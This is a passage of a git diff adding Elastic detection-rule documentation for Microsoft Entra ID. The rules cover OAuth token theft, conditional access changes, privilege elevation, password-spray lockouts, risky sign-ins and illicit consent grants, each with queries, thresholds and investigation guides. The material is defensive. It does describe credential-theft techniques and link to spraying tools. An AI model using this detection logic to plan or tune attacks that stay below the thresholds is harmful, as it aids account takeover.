+ azure.signinlogs.identity, + null) + +// Aggregate metrics by user identity +| stats + Esql.event_count = count(*), + Esql.azure_signinlogs_properties_authentication_device_code_case_count_distinct = count_distinct(Esql.azure_signinlogs_properties_authentication_device_code_case), + Esql.azure_signinlogs_properties_auth_visual_studio_count_distinct = count_distinct(Esql.azure_signinlogs_auth_visual_studio_case), + Esql.azure_signinlogs_properties_auth_other_count_distinct = count_distinct(Esql.azure_signinlogs_auth_other_case), + Esql.azure_signinlogs_properties_source_ip_count_distinct = count_distinct(source.ip), + Esql.azure_signinlogs_properties_source_ip_values = values(source.ip), + Esql.azure_signinlogs_properties_client_app_values = values(azure.signinlogs.properties.app_display_name), + Esql.azure_signinlogs_properties_resource_display_name_values = values(azure.signinlogs.properties.resource_display_name), + Esql.azure_signinlogs_properties_auth_requirement_values = values(azure.signinlogs.properties.authentication_requirement) + by azure.signinlogs.identity + +// Detect multiple unique IPs for one user with signs of deviceCode or VSC OAuth usage +| where + Esql.azure_signinlogs_properties_source_ip_count_distinct >= 2 + and ( + Esql.azure_signinlogs_properties_authentication_device_code_case_count_distinct > 0 + or Esql.azure_signinlogs_properties_auth_visual_studio_count_distinct > 0 + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Steal Application Access Token +** ID: T1528 +** Reference URL: https://attack.mitre.org/techniques/T1528/ +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Phishing +** ID: T1566 +** Reference URL: https://attack.mitre.org/techniques/T1566/ +* Sub-technique: +** Name: Spearphishing Link +** ID: T1566.002 +** Reference URL: https://attack.mitre.org/techniques/T1566/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-conditional-access-policy-cap-modified.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-conditional-access-policy-cap-modified.asciidoc new file mode 100644 index 0000000000..91ec86dfa2 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-conditional-access-policy-cap-modified.asciidoc @@ -0,0 +1,135 @@ +[[prebuilt-rule-8-19-8-microsoft-entra-id-conditional-access-policy-cap-modified]] +=== Microsoft Entra ID Conditional Access Policy (CAP) Modified + +Identifies a modification to a conditional access policy (CAP) in Microsoft Entra ID. Adversaries may modify existing CAPs to loosen access controls and maintain persistence in the environment with a compromised identity or entity. + +*Rule type*: new_terms + +*Rule indices*: + +* filebeat-* +* logs-azure.auditlogs-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/azure/active-directory/conditional-access/overview +* https://www.rezonate.io/blog/microsoft-entra-id-the-complete-guide-to-conditional-access-policies/ + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Data Source: Microsoft Entra ID +* Data Source: Microsoft Entra ID Audit Logs +* Use Case: Identity and Access Audit +* Use Case: Configuration Audit +* Tactic: Persistence +* Resources: Investigation Guide + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigation Guide: Microsoft Entra ID Conditional Access Policy (CAP) Modified* + + +Azure Conditional Access Policies (CAPs) are critical for enforcing secure access requirements such as multi-factor authentication (MFA), restricting specific users or groups, and managing sign-in conditions. Modifying these policies can be a technique for weakening an organization’s defenses and maintaining persistence after initial access. + +This rule detects a successful update to a Conditional Access Policy in Microsoft Entra ID (formerly Azure AD). + + +*Possible Investigation Steps* + + +- **Identify the user who modified the policy:** + - Check the value of `azure.auditlogs.properties.initiated_by.user.userPrincipalName` to determine the identity that made the change. + - Investigate their recent activity to determine if this change was expected or authorized. + +- **Review the modified policy name:** + - Look at `azure.auditlogs.properties.target_resources.*.display_name` to find the name of the affected policy. + - Determine whether this policy is related to critical controls (e.g., requiring MFA for admins). + +- **Analyze the policy change:** + - Compare the `old_value` and `new_value` fields under `azure.auditlogs.properties.target_resources.*.modified_properties.*`. + - Look for security-reducing changes, such as: + - Removing users/groups from enforcement. + - Disabling MFA or risk-based conditions. + - Introducing exclusions that reduce the policy’s coverage. + +- **Correlate with other activity:** + - Pivot on `azure.auditlogs.properties.activity_datetime` to identify if any suspicious sign-ins occurred after the policy was modified. + - Check for related authentication logs, particularly from the same IP address (`azure.auditlogs.properties.initiated_by.user.ipAddress`). + +- **Assess the user's legitimacy:** + - Review the initiator’s Azure role, group memberships, and whether their account was recently elevated or compromised. + - Investigate whether this user has a history of modifying policies or if this is anomalous. + + +*Validation & False Positive Considerations* + + +- **Authorized administrative changes:** Some organizations routinely update CAPs as part of policy tuning or role-based access reviews. +- **Security reviews or automation:** Scripts, CI/CD processes, or third-party compliance tools may programmatically update CAPs. +- **Employee lifecycle events:** Policy changes during employee onboarding/offboarding may include updates to access policies. + +If any of these cases apply and align with the activity's context, consider tuning the rule or adding exceptions for expected patterns. + + +*Response & Remediation* + + +- Revert unauthorized or insecure changes to the Conditional Access Policy immediately. +- Temporarily increase monitoring of CAP modifications and sign-in attempts. +- Lock or reset the credentials of the user account that made the change if compromise is suspected. +- Conduct a broader access review of conditional access policies and privileged user activity. +- Implement stricter change management and alerting around CAP changes. + + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset: "azure.auditlogs" + and event.action:"Update conditional access policy" + and event.outcome: "success" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Modify Authentication Process +** ID: T1556 +** Reference URL: https://attack.mitre.org/techniques/T1556/ +* Sub-technique: +** Name: Conditional Access Policies +** ID: T1556.009 +** Reference URL: https://attack.mitre.org/techniques/T1556/009/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-elevated-access-to-user-access-administrator.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-elevated-access-to-user-access-administrator.asciidoc new file mode 100644 index 0000000000..8802d6a14f --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-elevated-access-to-user-access-administrator.asciidoc @@ -0,0 +1,129 @@ +[[prebuilt-rule-8-19-8-microsoft-entra-id-elevated-access-to-user-access-administrator]] +=== Microsoft Entra ID Elevated Access to User Access Administrator + +Identifies when a user has elevated their access to User Access Administrator for their Azure Resources. The User Access Administrator role allows users to manage user access to Azure resources, including the ability to assign roles and permissions. Adversaries may target an Entra ID Global Administrator or other privileged role to elevate their access to User Access Administrator, which can lead to further privilege escalation and unauthorized access to sensitive resources. This is a New Terms rule that only signals if the user principal name has not been seen doing this activity in the last 14 days. + +*Rule type*: new_terms + +*Rule indices*: + +* filebeat-* +* logs-azure.auditlogs-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://learn.microsoft.com/en-us/azure/role-based-access-control/elevate-access-global-admin?tabs=azure-portal%2Centra-audit-logs/ +* https://permiso.io/blog/azures-apex-permissions-elevate-access-the-logs-security-teams-overlook +* https://www.microsoft.com/en-us/security/blog/2025/08/27/storm-0501s-evolving-techniques-lead-to-cloud-based-ransomware/ + +*Tags*: + +* Domain: Cloud +* Domain: Identity +* Data Source: Azure +* Data Source: Microsoft Entra ID +* Data Source: Microsoft Entra ID Audit Logs +* Use Case: Identity and Access Audit +* Tactic: Privilege Escalation +* Resources: Investigation Guide + +*Version*: 2 + +*Rule authors*: + +* Elastic +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and Analysis* + + + +*Investigating Microsoft Entra ID Elevated Access to User Access Administrator* + + +This rule identifies when a user elevates their permissions to the "User Access Administrator" role in Azure RBAC. This role allows full control over access management for Azure resources and can be abused by attackers for lateral movement, persistence, or privilege escalation. Since this is a New Terms rule, the alert will only trigger if the user has not performed this elevation in the past 14 days, helping reduce alert fatigue. + + +*Possible investigation steps* + + +- Review the `azure.auditlogs.properties.initiated_by.user.userPrincipalName` field to identify the user who elevated access. +- Check `source.ip` and associated `source.geo.*` fields to determine the origin of the action. Confirm whether the IP, ASN, and location are expected for this user. +- Investigate the application ID from `azure.auditlogs.properties.additional_details.value` to determine which interface or method was used to elevate access. +- Pivot to Azure `signinlogs` or Entra `auditlogs` to: + - Review recent login history for the user. + - Look for unusual sign-in patterns or MFA prompts. + - Determine whether the account has performed any other privilege-related operations. +- Correlate with directory role assignments or role-based access control (RBAC) modifications to assess whether the elevated access was used to add roles or modify permissions. + + +*False positive analysis* + + +- Legitimate admin actions may involve access elevation during maintenance, migration, or investigations. +- Some IT departments may elevate access temporarily without leaving structured change records. +- Review internal tickets, change logs, or admin activity dashboards for approved operations. + + +*Response and remediation* + + +- If elevation was not authorized: + - Immediately remove the User Access Administrator role from the account. + - Disable or lock the account and begin credential rotation. + - Audit activity performed by the account after elevation, especially changes to role assignments and resource access. +- If suspicious: + - Notify the user and confirm whether they performed the action. + - Check for any automation or scripts that could be exploiting unused elevated access paths. + - Review conditional access and PIM (Privileged Identity Management) configurations to limit elevation without approval. +- Strengthen posture: + - Require MFA and approval for all privilege escalation actions. + - Consider enabling JIT (Just-in-Time) access with expiration. + - Add alerts for repeated or unusual use of `Microsoft.Authorization/elevateAccess/action`. + + + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset: azure.auditlogs + and ( + azure.auditlogs.operation_name: "User has elevated their access to User Access Administrator for their Azure Resources" or + azure.auditlogs.properties.additional_details.value: "Microsoft.Authorization/elevateAccess/action" + ) and event.outcome: "success" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: Additional Cloud Roles +** ID: T1098.003 +** Reference URL: https://attack.mitre.org/techniques/T1098/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-exccessive-account-lockouts-detected.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-exccessive-account-lockouts-detected.asciidoc new file mode 100644 index 0000000000..053856b819 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-exccessive-account-lockouts-detected.asciidoc @@ -0,0 +1,222 @@ +[[prebuilt-rule-8-19-8-microsoft-entra-id-exccessive-account-lockouts-detected]] +=== Microsoft Entra ID Exccessive Account Lockouts Detected + +Identifies a high count of failed Microsoft Entra ID sign-in attempts as the result of the target user account being locked out. Adversaries may attempt to brute-force user accounts by repeatedly trying to authenticate with incorrect credentials, leading to account lockouts by Entra ID Smart Lockout policies. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 15m + +*Searches indices from*: now-60m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.microsoft.com/en-us/security/blog/2025/05/27/new-russia-affiliated-actor-void-blizzard-targets-critical-sectors-for-espionage/ +* https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying +* https://learn.microsoft.com/en-us/security/operations/incident-response-playbook-password-spray +* https://www.sprocketsecurity.com/blog/exploring-modern-password-spraying +* https://learn.microsoft.com/en-us/purview/audit-log-detailed-properties +* https://learn.microsoft.com/en-us/entra/identity-platform/reference-error-codes +* https://github.com/0xZDH/Omnispray +* https://github.com/0xZDH/o365spray + +*Tags*: + +* Domain: Cloud +* Domain: Identity +* Data Source: Azure +* Data Source: Entra ID +* Data Source: Entra ID Sign-in Logs +* Use Case: Identity and Access Audit +* Use Case: Threat Detection +* Tactic: Credential Access +* Resources: Investigation Guide + +*Version*: 3 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Microsoft Entra ID Exccessive Account Lockouts Detected* + + +This rule detects a high number of sign-in failures due to account lockouts (error code `50053`) in Microsoft Entra ID sign-in logs. These lockouts are typically caused by repeated authentication failures, often as a result of brute-force tactics such as password spraying, credential stuffing, or automated guessing. This detection is time-bucketed and aggregates attempts to identify bursts or coordinated campaigns targeting multiple users. + + +*Possible investigation steps* + + +- Review `user_id_list` and `user_principal_name`: Check if targeted users include high-value accounts such as administrators, service principals, or shared inboxes. +- Check `error_codes` and `result_description`: Validate that `50053` (account locked) is the consistent failure type. Messages indicating "malicious IP" activity suggest Microsoft’s backend flagged the source. +- Analyze `ip_list` and `source_orgs`: Identify whether the activity originated from known malicious infrastructure (e.g., VPNs, botnets, or public cloud providers). In the example, traffic originates from `MASSCOM`, which should be validated. +- Inspect `device_detail_browser` and `user_agent`: Clients like `"Python Requests"` indicate scripted automation rather than legitimate login attempts. +- Evaluate `unique_users` vs. `total_attempts`: A high ratio suggests distributed attacks across multiple accounts, characteristic of password spraying. +- Correlate `client_app_display_name` and `incoming_token_type`: PowerShell or unattended sign-in clients may be targeted for automation or legacy auth bypass. +- Review `conditional_access_status` and `risk_state`: If Conditional Access was not applied and risk was not flagged, policy scope or coverage should be reviewed. +- Validate time range (`first_seen`, `last_seen`): Determine whether the attack is a short burst or part of a longer campaign. + + +*False positive analysis* + + +- Misconfigured clients, scripts, or services with outdated credentials may inadvertently cause lockouts. +- Repeated lockouts from known internal IPs or during credential rotation windows could be benign. +- Legacy applications without modern auth support may repeatedly fail and trigger Smart Lockout. +- Specific known user agents (e.g., corporate service accounts). +- Internal IPs or cloud-hosted automation with expected failure behavior. + + +*Response and remediation* + + +- Investigate locked accounts immediately. Confirm if the account was successfully accessed prior to lockout. +- Reset credentials for impacted users and enforce MFA before re-enabling accounts. +- Block malicious IPs or ASN at the firewall, identity provider, or Conditional Access level. +- Audit authentication methods in use, and enforce modern auth (OAuth, SAML) over legacy protocols. +- Strengthen Conditional Access policies to reduce exposure from weak locations, apps, or clients. +- Conduct credential hygiene audits to assess reuse and rotation for targeted accounts. + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-azure.signinlogs-* + +| eval + Esql.time_window_date_trunc = date_trunc(30 minutes, @timestamp), + Esql_priv.azure_signinlogs_properties_user_principal_name_lower = to_lower(azure.signinlogs.properties.user_principal_name), + Esql.azure_signinlogs_properties_incoming_token_type_lower = to_lower(azure.signinlogs.properties.incoming_token_type), + Esql.azure_signinlogs_properties_app_display_name_lower = to_lower(azure.signinlogs.properties.app_display_name) + +| where event.dataset == "azure.signinlogs" + and event.category == "authentication" + and azure.signinlogs.category in ("NonInteractiveUserSignInLogs", "SignInLogs") + and event.outcome == "failure" + and azure.signinlogs.properties.authentication_requirement == "singleFactorAuthentication" + and azure.signinlogs.properties.status.error_code == 50053 + and azure.signinlogs.properties.user_principal_name is not null + and azure.signinlogs.properties.user_principal_name != "" + and source.`as`.organization.name != "MICROSOFT-CORP-MSN-as-BLOCK" + +| stats + Esql.azure_signinlogs_properties_authentication_requirement_values = values(azure.signinlogs.properties.authentication_requirement), + Esql.azure_signinlogs_properties_app_id_values = values(azure.signinlogs.properties.app_id), + Esql.azure_signinlogs_properties_app_display_name_values = values(azure.signinlogs.properties.app_display_name), + Esql.azure_signinlogs_properties_resource_id_values = values(azure.signinlogs.properties.resource_id), + Esql.azure_signinlogs_properties_resource_display_name_values = values(azure.signinlogs.properties.resource_display_name), + Esql.azure_signinlogs_properties_conditional_access_status_values = values(azure.signinlogs.properties.conditional_access_status), + Esql.azure_signinlogs_properties_device_detail_browser_values = values(azure.signinlogs.properties.device_detail.browser), + Esql.azure_signinlogs_properties_device_detail_device_id_values = values(azure.signinlogs.properties.device_detail.device_id), + Esql.azure_signinlogs_properties_device_detail_operating_system_values = values(azure.signinlogs.properties.device_detail.operating_system), + Esql.azure_signinlogs_properties_incoming_token_type_values = values(azure.signinlogs.properties.incoming_token_type), + Esql.azure_signinlogs_properties_risk_state_values = values(azure.signinlogs.properties.risk_state), + Esql.azure_signinlogs_properties_session_id_values = values(azure.signinlogs.properties.session_id), + Esql.azure_signinlogs_properties_user_id_values = values(azure.signinlogs.properties.user_id), + Esql_priv.azure_signinlogs_properties_user_principal_name_values = values(azure.signinlogs.properties.user_principal_name), + Esql.azure_signinlogs_result_description_values = values(azure.signinlogs.result_description), + Esql.azure_signinlogs_result_signature_values = values(azure.signinlogs.result_signature), + Esql.azure_signinlogs_result_type_values = values(azure.signinlogs.result_type), + + Esql.azure_signinlogs_properties_user_principal_name_lower_count_distinct = count_distinct(Esql_priv.azure_signinlogs_properties_user_principal_name_lower), + Esql_priv.azure_signinlogs_properties_user_principal_name_lower_values = values(Esql_priv.azure_signinlogs_properties_user_principal_name_lower), + Esql.azure_signinlogs_result_description_count_distinct = count_distinct(azure.signinlogs.result_description), + Esql.azure_signinlogs_properties_status_error_code_count_distinct = count_distinct(azure.signinlogs.properties.status.error_code), + Esql.azure_signinlogs_properties_status_error_code_values = values(azure.signinlogs.properties.status.error_code), + Esql.azure_signinlogs_properties_incoming_token_type_lower_values = values(Esql.azure_signinlogs_properties_incoming_token_type_lower), + Esql.azure_signinlogs_properties_app_display_name_lower_values = values(Esql.azure_signinlogs_properties_app_display_name_lower), + Esql.source_ip_values = values(source.ip), + Esql.source_ip_count_distinct = count_distinct(source.ip), + Esql.source_as_organization_name_values = values(source.`as`.organization.name), + Esql.source_as_organization_name_count_distinct = count_distinct(source.`as`.organization.name), + Esql.source_geo_country_name_values = values(source.geo.country_name), + Esql.source_geo_country_name_count_distinct = count_distinct(source.geo.country_name), + Esql.@timestamp.min = min(@timestamp), + Esql.@timestamp.max = max(@timestamp), + Esql.event_count = count() +by Esql.time_window_date_trunc + +| where Esql.azure_signinlogs_properties_user_principal_name_lower_count_distinct >= 15 and Esql.event_count >= 20 + +| keep + Esql.time_window_date_trunc, + Esql.event_count, + Esql.@timestamp.min, + Esql.@timestamp.max, + Esql.azure_signinlogs_properties_user_principal_name_lower_count_distinct, + Esql_priv.azure_signinlogs_properties_user_principal_name_lower_values, + Esql.azure_signinlogs_result_description_count_distinct, + Esql.azure_signinlogs_result_description_values, + Esql.azure_signinlogs_properties_status_error_code_count_distinct, + Esql.azure_signinlogs_properties_status_error_code_values, + Esql.azure_signinlogs_properties_incoming_token_type_lower_values, + Esql.azure_signinlogs_properties_app_display_name_lower_values, + Esql.source_ip_values, + Esql.source_ip_count_distinct, + Esql.source_as_organization_name_values, + Esql.source_as_organization_name_count_distinct, + Esql.source_geo_country_name_values, + Esql.source_geo_country_name_count_distinct, + Esql.azure_signinlogs_properties_authentication_requirement_values, + Esql.azure_signinlogs_properties_app_id_values, + Esql.azure_signinlogs_properties_app_display_name_values, + Esql.azure_signinlogs_properties_resource_id_values, + Esql.azure_signinlogs_properties_resource_display_name_values, + Esql.azure_signinlogs_properties_conditional_access_status_values, + Esql.azure_signinlogs_properties_device_detail_browser_values, + Esql.azure_signinlogs_properties_device_detail_device_id_values, + Esql.azure_signinlogs_properties_device_detail_operating_system_values, + Esql.azure_signinlogs_properties_incoming_token_type_values, + Esql.azure_signinlogs_properties_risk_state_values, + Esql.azure_signinlogs_properties_session_id_values, + Esql.azure_signinlogs_properties_user_id_values, + Esql_priv.azure_signinlogs_properties_user_principal_name_values, + Esql.azure_signinlogs_result_description_values, + Esql.azure_signinlogs_result_signature_values, + Esql.azure_signinlogs_result_type_values + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Brute Force +** ID: T1110 +** Reference URL: https://attack.mitre.org/techniques/T1110/ +* Sub-technique: +** Name: Password Guessing +** ID: T1110.001 +** Reference URL: https://attack.mitre.org/techniques/T1110/001/ +* Sub-technique: +** Name: Password Spraying +** ID: T1110.003 +** Reference URL: https://attack.mitre.org/techniques/T1110/003/ +* Sub-technique: +** Name: Credential Stuffing +** ID: T1110.004 +** Reference URL: https://attack.mitre.org/techniques/T1110/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-high-risk-sign-in.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-high-risk-sign-in.asciidoc new file mode 100644 index 0000000000..5786826873 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-high-risk-sign-in.asciidoc @@ -0,0 +1,124 @@ +[[prebuilt-rule-8-19-8-microsoft-entra-id-high-risk-sign-in]] +=== Microsoft Entra ID High Risk Sign-in + +Identifies high risk Microsoft Entra ID sign-ins by leveraging Microsoft's Identity Protection machine learning and heuristics. Identity Protection categorizes risk into three tiers: low, medium, and high. While Microsoft does not provide specific details about how risk is calculated, each level brings higher confidence that the user or sign-in is compromised. + +*Rule type*: query + +*Rule indices*: + +* filebeat-* +* logs-azure.signinlogs-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/azure/active-directory/conditional-access/howto-conditional-access-policy-risk +* https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/overview-identity-protection +* https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/howto-identity-protection-investigate-risk + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Data Source: Microsoft Entra ID +* Data Source: Microsoft Entra ID Sign-in Logs +* Use Case: Identity and Access Audit +* Resources: Investigation Guide +* Tactic: Initial Access + +*Version*: 109 + +*Rule authors*: + +* Elastic +* Willem D'Haese + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Microsoft Entra ID High Risk Sign-in* + + +This rule detects high-risk sign-ins in Microsoft Entra ID as identified by Identity Protection. These sign-ins are flagged with a risk level of `high` during the authentication process, indicating a strong likelihood of compromise based on Microsoft’s machine learning and heuristics. This alert is valuable for identifying accounts under active attack or compromise using valid credentials. + + +*Possible investigation steps* + + +- Review the `azure.signinlogs.properties.user_id` and associated identity fields to determine the impacted user. +- Inspect the `risk_level_during_signin` field and confirm it is set to `high`. If `risk_level_aggregated` is also present and high, this suggests sustained risk across multiple sign-ins. +- Check `source.ip`, `source.geo.country_name`, and `source.as.organization.name` to evaluate the origin of the sign-in attempt. Flag unexpected geolocations or ASNs (e.g., anonymizers or residential ISPs). +- Review the `device_detail` fields such as `operating_system` and `browser` for new or unrecognized devices. +- Validate the `client_app_used` (e.g., legacy protocols, desktop clients) and `app_display_name` (e.g., Office 365 Exchange Online) to assess if risky legacy methods were involved. +- Examine `applied_conditional_access_policies` to verify if MFA or blocking policies were triggered or bypassed. +- Check `authentication_details.authentication_method` to see if multi-factor authentication was satisfied (e.g., "Mobile app notification"). +- Correlate this activity with other alerts or sign-ins from the same account within the last 24–48 hours. +- Contact the user to confirm if the sign-in was expected. If not, treat the account as compromised and proceed with containment. + + +*False positive analysis* + + +- Risky sign-ins may be triggered during legitimate travel, VPN use, or remote work scenarios from unusual locations. +- In some cases, users switching devices or networks rapidly may trigger high-risk scores. +- Automated scanners or penetration tests using known credentials may mimic high-risk login behavior. +- Confirm whether the risk was remediated automatically by Microsoft Identity Protection before proceeding with escalations. + + +*Response and remediation* + + +- If compromise is suspected, immediately disable the user account and revoke active sessions and tokens. +- Initiate credential reset and ensure multi-factor authentication is enforced. +- Review audit logs and sign-in history for the account to assess lateral movement or data access post sign-in. +- Inspect activity on services such as Exchange, SharePoint, or Azure resources to understand the impact. +- Determine if the attacker leveraged other accounts or escalated privileges. +- Use the incident findings to refine conditional access policies, such as enforcing MFA for high-risk sign-ins or blocking legacy protocols. +- Review and tighten policies that allow sign-ins from high-risk geographies or unknown devices. + + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.signinlogs and + ( + azure.signinlogs.properties.risk_level_during_signin:high or + azure.signinlogs.properties.risk_level_aggregated:high + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-illicit-consent-grant-via-registered-application.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-illicit-consent-grant-via-registered-application.asciidoc new file mode 100644 index 0000000000..bd9172ef44 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-microsoft-entra-id-illicit-consent-grant-via-registered-application.asciidoc @@ -0,0 +1,138 @@ +[[prebuilt-rule-8-19-8-microsoft-entra-id-illicit-consent-grant-via-registered-application]] +=== Microsoft Entra ID Illicit Consent Grant via Registered Application + +Identifies an illicit consent grant request on-behalf-of a registered Entra ID application. Adversaries may create and register an application in Microsoft Entra ID for the purpose of requesting user consent to access resources. This is accomplished by tricking a user into granting consent to the application, typically via a pre-made phishing URL. This establishes an OAuth grant that allows the malicious client applocation to access resources on-behalf-of the user. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-azure.auditlogs-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.wiz.io/blog/midnight-blizzard-microsoft-breach-analysis-and-best-practices +* https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/detect-and-remediate-illicit-consent-grants?view=o365-worldwide +* https://www.cloud-architekt.net/detection-and-mitigation-consent-grant-attacks-azuread/ +* https://docs.microsoft.com/en-us/defender-cloud-apps/investigate-risky-oauth#how-to-detect-risky-oauth-apps + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Data Source: Microsoft Entra ID +* Data Source: Microsoft Entra ID Audit Logs +* Use Case: Identity and Access Audit +* Resources: Investigation Guide +* Tactic: Initial Access +* Tactic: Credential Access + +*Version*: 218 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Microsoft Entra ID Illicit Consent Grant via Registered Application* + + +Adversaries may register a malicious application in Microsoft Entra ID and trick users into granting excessive permissions via OAuth consent. These applications can access sensitive data—such as mail, profiles, or files—on behalf of the user once consent is granted. This is commonly delivered via spearphishing links that prompt users to approve permissions for seemingly legitimate applications. + +This rule identifies a new consent grant event based on Azure audit logs where the application was granted access with potentially risky scopes, such as offline_access, Mail.Read, or User.Read, and may include admin consent or tenant-wide delegation. + +This is a New Terms rule that will only trigger if the user and client ID have not been seen doing this activity in the last 14 days. + + +*Possible investigation steps* + + +- Review `azure.auditlogs.properties.additional_details.value` to identify the AppId and User-Agent values to determine which application was granted access and how the request was initiated. Pivot on the AppId in the Azure portal under Enterprise Applications to investigate further. +- Review `azure.auditlogs.properties.initiated_by.user.userPrincipalName` to identify the user who approved the application. Investigate their recent activity for signs of phishing, account compromise, or anomalous behavior during the timeframe of the consent. +- Review `azure.auditlogs.properties.initiated_by.user.ipAddress` to assess the geographic source of the consent action. Unexpected locations or IP ranges may indicate adversary-controlled infrastructure. +- Review `azure.auditlogs.properties.target_resources.display_name` to evaluate whether the application name is familiar, expected, or potentially spoofing a known service. +- Review `azure.auditlogs.properties.target_resources.modified_properties.display_name` to inspect key indicators of elevated privilege or risk, including: + - ConsentContext.IsAdminConsent to determine if the application was granted tenant-wide admin access. + - ConsentContext.OnBehalfOfAll to identify whether the app was granted permissions on behalf of all users in the tenant. + - ConsentAction.Permissions to evaluate the specific scopes and data access the application requested. + - ConsentAction.Reason to understand if Microsoft flagged the activity or if any reason was recorded by the platform. + - TargetId.ServicePrincipalNames to confirm the service principal associated with the granted permissions. +- Review `azure.tenant_id` to confirm the activity originated from your tenant and is not related to a cross-tenant application. +- Review `@timestamp` and `azure.auditlogs.properties.correlation_id` to pivot into related sign-in, token usage, or application activity for further context. + + +*False positive analysis* + + +- Some applications may request high-privilege scopes for legitimate purposes. Validate whether the application is verified, developed by Microsoft, or approved internally by your organization. +- Review publisher verification, app ownership, and scope alignment with the intended business use case. + + +*Response and remediation* + + +- Revoke the application’s OAuth grant using Graph API or PowerShell. Use the Remove-AzureADOAuth2PermissionGrant cmdlet. +- Remove the associated service principal from Azure AD. +- Reset credentials or revoke tokens for affected users. +- Block the application via Conditional Access or Defender for Cloud Apps policies. +- Enable the Admin Consent Workflow in Azure AD to prevent unsanctioned user approvals 